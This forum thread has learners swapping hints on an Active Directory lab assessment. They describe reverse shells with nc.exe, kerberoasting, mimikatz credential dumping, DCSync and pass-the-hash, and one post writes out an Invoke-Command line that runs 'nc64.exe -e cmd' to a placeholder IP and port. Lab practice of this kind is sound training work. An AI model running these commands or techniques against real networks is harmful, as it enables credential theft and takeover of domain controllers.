Active Directory - Skills Assessment I

hey folks,

Looking for a nudge on the AD skills assessment I.

I’ve gotten all of the questions except for the last one - gaining a shell on the DC. Here’s what I’ve done so far:

  • used the web shell to get a more stable reverse shell with nc.exe
  • kerberoasted first user
  • used Enter-PSSession and nc.exe to gain a stable shell on the second box
  • used mimikatz to dump cached creds on the second box
  • obtained creds for second user with dcsync rights

the creds i’ve obtained are valid but the user doesnt have remoting rights…things Ive tried that dont work

  • psexec.exe from box1 and box 2 to DC (unauthorized)
  • PSSession from box2 (unauthorized)
  • PTH from box2 using mimikatz (not working - i think it’s because its done through a reverse shell)
  • OPTH from box2 using mimikatz (not working, cant turn the ntlm hash into a kerberos ticket, or its not caching)
  • dcsync attack through mimikatz (not working from box2)

things I havent tried yet:

  • secretsdump.exe
  • PTT

Looking for a nudge on what would be the right technique to gain access to the DC

1 Like

I can’t get either of these to work on the second box. The Enter-PSSession works but gives me a very disfunctional session. Can’t get nc.exe to run on second box properly at all…

1 Like

What I usually do once I have the unstable shell with Enter-PSSession is I upload nc.exe to the first box, then download nc.exe into the second box from the first box through that unstable shell, then pop a more solid shell through a different port from box2 to box1. Kind of schlep but it gets me through.

Couldn’t get that to work…had to use a different method…but I’m at the trying to DCSync the DC now… :exploding_head: :exploding_head: :exploding_head:

Hi, did you got any result? I’m at the same point, I can’t make that creepy shell works to download nc.exe

what other method did you use? I think my methodology is kind of clunky here and I’m starting to overthink it / go in other directions not covered in the lessons…hmmmm

@sirius3000 @PaoloCMP I figured it out! send me a PM if you need a nudge. I was definitely overthinking it.

1 Like

i have to make with scriptblock like this Invoke-Command -computername box2 -credential $cred -ScriptBlock{command}
Now trying to make a dcsync.
i put nc.exe and other files in uploads(webFolder)
this way it was simpler to download and execute the reverse shell from box2 to box1
now it’s the dcsync part secretsdump doesn’t return me the screen in the shell to put the password or follow the result

How did you get the password of tp**** from second box?

sekurlsa::lnPassword fu

i receive a shell from box2 running Invoke-Command -computername BOX2 -credential $cred -ScriptBlock{.\nc64.exe -e cmd IP PORT}

Im stuck in DCsync attack need a small hit

got it. i have to impersonate user t**** to run dcsync attack

PTH with /impersonate

I did dcsync, now I’m blocked with the hash. Tell me if you need a hint

i use Invoke-WMIExec to move with hash to box03(DC)

Hi All, I ran Mimikatz with sekurlsa::loXXXXX on second box but no cleartext password for THAT user.
Any guide for Question “Submit this user’s cleartext password.” ?

1 Like

Anyone for part two?

same here stuck on Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

already get C:\flag.txt on ms*1

I solved Question “Submit this user’s cleartext password.” now. Dont know is this the intended way to do it but I need to add a registy entry and restart the machine to get the plaintext password with Mimikatz “sekurlsa::loXXXXX FXXX”

Please find the below reference

i am using on MS** A90 credentials
I do not have admin permission to add the registry or restart the machine with this user :frowning:

Hi @binho1337 , Im still working on Skills-Assessment-I :rofl:
I think your question is Skills-Assessment-II?